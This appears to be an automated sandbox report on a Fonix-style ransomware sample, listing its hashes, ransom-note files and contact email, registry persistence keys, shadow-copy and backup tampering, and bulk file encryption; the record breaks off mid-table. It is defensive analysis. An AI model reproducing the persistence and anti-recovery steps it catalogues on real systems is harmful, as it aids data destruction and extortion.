Analysis
-
max time kernel
254s -
max time network
134s -
platform
windows7_x64 -
resource
win7 -
submitted
12-07-2020 07:16
Static task
static1
Behavioral task
behavioral1
Sample
XINOF.exe
Resource
win7
General
-
Target
XINOF.exe
-
Size
561KB
-
MD5
ff23cd4f45d231f8af9f23a2e730bee6
-
SHA1
0eea13dc19ab5de9ec7ffd81ef89bddf5994f6ef
-
SHA256
4ce5dda2c3d39cc6c22058add4b64fbedc20f11ba06768b0a3b959f20c88f5fa
-
SHA512
78c90354ca919c7bdce56034b1a432e7c3a0860b9faf9d351f74c50c3a8521c343a29d5c9c8babbedcc741acdc4138dc6e3cdc2c8e337f97ed5b99cf583102e8
Malware Config
Extracted
C:\Users\Admin\Desktop\How To Decrypt Files.hta
Thunder@fonix.email
Signatures
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 1296 bcdedit.exe 1776 bcdedit.exe -
Processes:
wbadmin.exepid process 1896 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables taskbar notifications via registry modification
-
Modifies Installed Components in the registry 2 TTPs
-
Modifies extensions of user files 2 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
XINOF.exedescription ioc process File opened for modification C:\Users\Admin\Pictures\UndoUnprotect.tiff XINOF.exe File opened for modification C:\Users\Admin\Pictures\StepRead.tiff XINOF.exe -
Drops startup file 7 IoCs
Processes:
XINOF.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Cpriv.key XINOF.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\How To Decrypt Files.hta XINOF.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Help.txt XINOF.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Cpriv.key XINOF.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\How To Decrypt Files.hta XINOF.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\Help.txt XINOF.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
reg.exereg.exereg.exereg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\Run\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\PhoenixTechnology = "C:\\Users\\Admin\\AppData\\Local\\TempFonix.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe -
Drops desktop.ini file(s) 64 IoCs
Processes:
XINOF.exedescription ioc process File created C:\ProgramData\Microsoft\Windows\Ringtones\desktop.ini XINOF.exe File created C:\Users\Admin\Music\desktop.ini XINOF.exe File created C:\Users\Public\Music\desktop.ini XINOF.exe File created C:\Program Files\desktop.ini XINOF.exe File created C:\Users\All Users\Microsoft\Windows\Ringtones\desktop.ini XINOF.exe File created C:\Users\Public\Documents\desktop.ini XINOF.exe File created C:\Users\Public\Libraries\desktop.ini XINOF.exe File created C:\Users\Public\Music\Sample Music\desktop.ini XINOF.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini XINOF.exe File created C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini XINOF.exe File created C:\Users\Admin\Contacts\desktop.ini XINOF.exe File created C:\Users\Admin\Favorites\Links for United States\desktop.ini XINOF.exe File created C:\Users\Admin\Videos\desktop.ini XINOF.exe File created C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\desktop.ini XINOF.exe File created C:\Users\Public\Recorded TV\desktop.ini XINOF.exe File created C:\Users\Public\Recorded TV\Sample Media\desktop.ini XINOF.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini XINOF.exe File created C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini XINOF.exe File created C:\Users\Public\Desktop\desktop.ini XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI XINOF.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini XINOF.exe File created C:\Users\Admin\Favorites\Links\desktop.ini XINOF.exe File created C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini XINOF.exe File created C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini XINOF.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini XINOF.exe File created C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini XINOF.exe File created C:\Users\Public\Pictures\Sample Pictures\desktop.ini XINOF.exe File created C:\Users\Public\Videos\desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AJM03J3Y\desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini XINOF.exe File created C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini XINOF.exe File created C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini XINOF.exe File created C:\Users\Public\Videos\Sample Videos\desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZMLBLRQ7\desktop.ini XINOF.exe File created C:\Users\Admin\Desktop\desktop.ini XINOF.exe File created C:\Users\Admin\Pictures\desktop.ini XINOF.exe File created C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.ini XINOF.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\V8SX06NR\desktop.ini XINOF.exe File created C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\desktop.ini XINOF.exe File created C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\Desktop.ini XINOF.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini XINOF.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Tablet PC\Desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini XINOF.exe File created C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\RBDIK06K\desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini XINOF.exe File created C:\Users\Admin\Downloads\desktop.ini XINOF.exe File created C:\Users\Admin\Favorites\desktop.ini XINOF.exe File created C:\Users\Admin\Links\desktop.ini XINOF.exe File created C:\Users\All Users\Microsoft\Windows\Start Menu\Programs\Games\desktop.ini XINOF.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini XINOF.exe File created C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini XINOF.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini XINOF.exe File created C:\Users\Admin\Searches\desktop.ini XINOF.exe File created C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibility\Desktop.ini XINOF.exe File created C:\Program Files (x86)\desktop.ini XINOF.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
label.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exedescription ioc process File opened (read-only) \??\I: label.exe File opened (read-only) \??\M: label.exe File opened (read-only) \??\Q: label.exe File opened (read-only) \??\D: label.exe File opened (read-only) \??\N: label.exe File opened (read-only) \??\O: label.exe File opened (read-only) \??\P: label.exe File opened (read-only) \??\R: label.exe File opened (read-only) \??\T: label.exe File opened (read-only) \??\V: label.exe File opened (read-only) \??\W: label.exe File opened (read-only) \??\X: label.exe File opened (read-only) \??\F: label.exe File opened (read-only) \??\J: label.exe File opened (read-only) \??\K: label.exe File opened (read-only) \??\A: label.exe File opened (read-only) \??\B: label.exe File opened (read-only) \??\S: label.exe File opened (read-only) \??\Y: label.exe File opened (read-only) \??\Z: label.exe File opened (read-only) \??\E: label.exe File opened (read-only) \??\G: label.exe File opened (read-only) \??\H: label.exe File opened (read-only) \??\L: label.exe File opened (read-only) \??\U: label.exe -
Drops file in Program Files directory 64 IoCs
Processes:
XINOF.exedescription ioc process File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL090.XML XINOF.exe File opened for modification C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.5\System.Web.Entity.dll XINOF.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar XINOF.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\Cpriv.key XINOF.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\goopdateres_sr.dll XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\POLICIES.FDT XINOF.exe File created C:\Program Files\Windows Media Player\Visualizations\Help.txt XINOF.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Postage_ButtonGraphic.png XINOF.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.UDT XINOF.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301 XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR37F.GIF XINOF.exe File created C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ESEN\Cpriv.key XINOF.exe File created C:\Program Files\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\Cpriv.key XINOF.exe File created C:\Program Files\Windows Media Player\Network Sharing\How To Decrypt Files.hta XINOF.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\lt-LT\Help.txt XINOF.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\ACEODEXL.DLL XINOF.exe File created C:\Program Files\Windows Defender\MpOAV.dll XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Effects\Thatch.eftx XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MSOHEV.DLL XINOF.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-applemenu.jar XINOF.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239975.WMF XINOF.exe File opened for modification C:\Program Files\VideoLAN\VLC\vlc.exe XINOF.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\How To Decrypt Files.hta XINOF.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\How To Decrypt Files.hta XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\WWLIB.DLL XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\OUTLWVW.DLL.IDX_DLL XINOF.exe File created C:\Program Files\VideoLAN\VLC\locale\mai\Cpriv.key XINOF.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar XINOF.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HH00260_.WMF XINOF.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\demux\libdemux_cdg_plugin.dll XINOF.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\da.pak XINOF.exe File opened for modification C:\Program Files (x86)\Internet Explorer\jsdebuggeride.dll XINOF.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ECLIPSE\ECLIPSE.ELM XINOF.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0230876.WMF XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\PULLQUOTEBB.POC XINOF.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\BLUEPRNT\How To Decrypt Files.hta XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Composite.thmx XINOF.exe File created C:\Program Files\Common Files\System\MSMAPI\Help.txt XINOF.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\shuffle_over.png XINOF.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libspatializer_plugin.dll XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME23.CSS XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\STORYVERTBB.POC XINOF.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_zh_4.4.0.v20140623020002.jar XINOF.exe File created C:\Program Files\Microsoft Office\MEDIA\OFFICE14\LINES\Cpriv.key XINOF.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\appletrailers.luac XINOF.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA01473_.WMF XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\ENV98SP.POC XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Oasis\TAB_OFF.GIF XINOF.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\Help.txt XINOF.exe File opened for modification C:\Program Files\Java\jre7\bin\npt.dll XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\GlobeButtonImage.jpg XINOF.exe File created C:\Program Files (x86)\MSBuild\Microsoft\Cpriv.key XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME14.CSS XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PAGESIZE\PGLBL086.XML XINOF.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\32.png XINOF.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.THD XINOF.exe File created C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Groove.en-us\How To Decrypt Files.hta XINOF.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\TN01308_.WMF XINOF.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac XINOF.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\Help.txt XINOF.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\Sounds\People\SNEEZE.WAV XINOF.exe File created C:\Program Files (x86)\Adobe\Cpriv.key XINOF.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host-remote_ja.jar XINOF.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\NA02413_.WMF XINOF.exe -
Drops file in Windows directory 6 IoCs
Processes:
wbadmin.exeXINOF.exedescription ioc process File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl wbadmin.exe File created C:\Windows\How To Decrypt Files.hta XINOF.exe File created C:\Windows\Help.txt XINOF.exe File created C:\Windows\Cpriv.key XINOF.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl wbadmin.exe File opened for modification C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl wbadmin.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 316 1228 WerFault.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 740 vssadmin.exe -
Processes:
mshta.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 5 IoCs
Processes:
Explorer.EXEdescription ioc process Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_Classes\Local Settings Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell Explorer.EXE Key created \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots Explorer.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff Explorer.EXE -
Runs ping.exe 1 TTPs 2 IoCs
-
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
mshta.exepid process 812 mshta.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
XINOF.exeWerFault.exepowershell.exepid process 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 1492 XINOF.exe 316 WerFault.exe 316 WerFault.exe 316 WerFault.exe 316 WerFault.exe 1672 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1156 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 61 IoCs
Processes:
WerFault.exeWMIC.exevssvc.exeExplorer.EXEpowershell.exedescription pid process Token: SeDebugPrivilege 316 WerFault.exe Token: SeIncreaseQuotaPrivilege 1620 WMIC.exe Token: SeSecurityPrivilege 1620 WMIC.exe Token: SeTakeOwnershipPrivilege 1620 WMIC.exe Token: SeLoadDriverPrivilege 1620 WMIC.exe Token: SeSystemProfilePrivilege 1620 WMIC.exe Token: SeSystemtimePrivilege 1620 WMIC.exe Token: SeProfSingleProcessPrivilege 1620 WMIC.exe Token: SeIncBasePriorityPrivilege 1620 WMIC.exe Token: SeCreatePagefilePrivilege 1620 WMIC.exe Token: SeBackupPrivilege 1620 WMIC.exe Token: SeRestorePrivilege 1620 WMIC.exe Token: SeShutdownPrivilege 1620 WMIC.exe Token: SeDebugPrivilege 1620 WMIC.exe Token: SeSystemEnvironmentPrivilege 1620 WMIC.exe Token: SeRemoteShutdownPrivilege 1620 WMIC.exe Token: SeUndockPrivilege 1620 WMIC.exe Token: SeManageVolumePrivilege 1620 WMIC.exe Token: 33 1620 WMIC.exe Token: 34 1620 WMIC.exe Token: 35 1620 WMIC.exe Token: SeIncreaseQuotaPrivilege 1620 WMIC.exe Token: SeSecurityPrivilege 1620 WMIC.exe Token: SeTakeOwnershipPrivilege 1620 WMIC.exe Token: SeLoadDriverPrivilege 1620 WMIC.exe Token: SeSystemProfilePrivilege 1620 WMIC.exe Token: SeSystemtimePrivilege 1620 WMIC.exe Token: SeProfSingleProcessPrivilege 1620 WMIC.exe Token: SeIncBasePriorityPrivilege 1620 WMIC.exe Token: SeCreatePagefilePrivilege 1620 WMIC.exe Token: SeBackupPrivilege 1620 WMIC.exe Token: SeRestorePrivilege 1620 WMIC.exe Token: SeShutdownPrivilege 1620 WMIC.exe Token: SeDebugPrivilege 1620 WMIC.exe Token: SeSystemEnvironmentPrivilege 1620 WMIC.exe Token: SeRemoteShutdownPrivilege 1620 WMIC.exe Token: SeUndockPrivilege 1620 WMIC.exe Token: SeManageVolumePrivilege 1620 WMIC.exe Token: 33 1620 WMIC.exe Token: 34 1620 WMIC.exe Token: 35 1620 WMIC.exe Token: SeBackupPrivilege 1040 vssvc.exe Token: SeRestorePrivilege 1040 vssvc.exe Token: SeAuditPrivilege 1040 vssvc.exe Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeDebugPrivilege 1672 powershell.exe Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeShutdownPrivilege 1156 Explorer.EXE Token: SeShutdownPrivilege 1156 Explorer.EXE -
Suspicious use of FindShellTrayWindow 46 IoCs
Processes:
Explorer.EXEpid process 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE -
Suspicious use of SendNotifyMessage 50 IoCs
Processes:
Explorer.EXEpid process 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE 1156 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
XINOF.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1492 wrote to memory of 1016 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1016 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1016 1492 XINOF.exe cmd.exe PID 1016 wrote to memory of 388 1016 cmd.exe schtasks.exe PID 1016 wrote to memory of 388 1016 cmd.exe schtasks.exe PID 1016 wrote to memory of 388 1016 cmd.exe schtasks.exe PID 1492 wrote to memory of 112 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 112 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 112 1492 XINOF.exe cmd.exe PID 112 wrote to memory of 736 112 cmd.exe reg.exe PID 112 wrote to memory of 736 112 cmd.exe reg.exe PID 112 wrote to memory of 736 112 cmd.exe reg.exe PID 1492 wrote to memory of 1112 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1112 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1112 1492 XINOF.exe cmd.exe PID 1112 wrote to memory of 1036 1112 cmd.exe reg.exe PID 1112 wrote to memory of 1036 1112 cmd.exe reg.exe PID 1112 wrote to memory of 1036 1112 cmd.exe reg.exe PID 1492 wrote to memory of 1032 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1032 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1032 1492 XINOF.exe cmd.exe PID 1032 wrote to memory of 1516 1032 cmd.exe reg.exe PID 1032 wrote to memory of 1516 1032 cmd.exe reg.exe PID 1032 wrote to memory of 1516 1032 cmd.exe reg.exe PID 1492 wrote to memory of 1508 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1508 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1508 1492 XINOF.exe cmd.exe PID 1508 wrote to memory of 1676 1508 cmd.exe reg.exe PID 1508 wrote to memory of 1676 1508 cmd.exe reg.exe PID 1508 wrote to memory of 1676 1508 cmd.exe reg.exe PID 1492 wrote to memory of 1296 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1296 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1296 1492 XINOF.exe cmd.exe PID 1296 wrote to memory of 1784 1296 cmd.exe reg.exe PID 1296 wrote to memory of 1784 1296 cmd.exe reg.exe PID 1296 wrote to memory of 1784 1296 cmd.exe reg.exe PID 1492 wrote to memory of 1768 1492 XINOF.exe cmd.exe PID 1492 wrote to memory of 1768 1492 XINOF.exe cmd.exe PID 1492 